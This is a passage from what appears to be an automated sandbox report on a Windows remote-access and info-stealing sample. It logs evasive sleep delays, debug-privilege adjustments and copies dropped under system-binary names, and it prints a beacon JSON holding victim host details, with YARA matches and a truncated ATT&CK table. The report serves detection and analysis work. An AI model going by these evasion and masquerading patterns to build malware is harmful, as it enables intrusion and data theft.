                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595834Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595718Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595609Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595499Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWindow / User API: threadDelayed 1382Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWindow / User API: threadDelayed 705Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeWindow / User API: threadDelayed 368Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeWindow / User API: threadDelayed 367Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWindow / User API: threadDelayed 3141Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeWindow / User API: threadDelayed 6630Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeWindow / User API: threadDelayed 366
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeWindow / User API: threadDelayed 368
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeWindow / User API: threadDelayed 369
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeWindow / User API: threadDelayed 364
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7344Thread sleep count: 1382 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7336Thread sleep count: 705 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 2004Thread sleep count: 368 > 30Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 344Thread sleep count: 367 > 30Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -3600000s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599859s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599749s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599640s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599531s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599421s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599311s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599187s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -599078s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598968s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598859s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598750s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598630s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598500s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598390s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598275s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598156s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -598031s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597861s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597745s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597640s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597515s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597406s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597296s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597187s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -597078s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596967s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596858s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596734s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596625s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596515s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596390s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596277s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596171s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -596062s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595953s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595834s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595718s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595609s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 7428Thread sleep time: -595499s >= -30000sJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 5104Thread sleep count: 320 > 30
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe TID: 4180Thread sleep count: 49 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 5040Thread sleep count: 366 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 8184Thread sleep count: 368 > 30
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe TID: 8132Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 6120Thread sleep count: 369 > 30
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 4600Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 928Thread sleep count: 364 > 30
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 3600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599749Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599531Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599421Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599311Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598968Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598859Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598750Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598630Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598500Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598275Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 598031Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597861Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597745Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597640Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597406Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597296Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597187Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 597078Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596967Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596858Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596625Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596515Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596390Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596277Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596171Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 596062Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595953Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595834Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595718Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595609Jump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeThread delayed: delay time: 595499Jump to behavior
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: w32tm.exe, 00000027.00000002.1722643285.0000021275E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4101849404.000000001BB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF:&
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"226533","UserName":"user","IpInfo":{"ip":"8.46.123.33","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"226533","UserName":"user","IpInfo":{"ip":"8.46.123.33","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}p
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeQueries volume information: C:\Users\user\Desktop\dmhu7oz5yP.exe VolumeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeQueries volume information: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe VolumeInformationJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeQueries volume information: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeQueries volume information: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeQueries volume information: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe VolumeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeQueries volume information: C:\Users\Public\Libraries\RuntimeBroker.exe VolumeInformation
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeQueries volume information: C:\Users\Public\Libraries\RuntimeBroker.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeQueries volume information: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeQueries volume information: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe VolumeInformation
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7632, type: MEMORYSTR
                            Source: Yara matchFile source: dmhu7oz5yP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: Process Memory Space: dmhu7oz5yP.exe PID: 7296, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7584, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7604, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7664, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7688, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7720, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 3524, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5600, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Media\WinStore.App.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7632, type: MEMORYSTR
                            Source: Yara matchFile source: dmhu7oz5yP.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: Process Memory Space: dmhu7oz5yP.exe PID: 7296, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7584, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7604, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: jnTUlYyDyuybgXdgxhTkT.exe PID: 7664, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7688, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7720, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 3524, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5600, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Media\WinStore.App.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts11
                            Windows Management Instrumentation
                            1
                            Scheduled Task/Job
                            12
                            Process Injection
                            233
                            Masquerading
                            OS Credential Dumping21
                            Security Software Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job
                            1
                            Scripting
                            1
                            Scheduled Task/Job
                            1
                            Disable or Modify Tools
                            LSASS Memory2
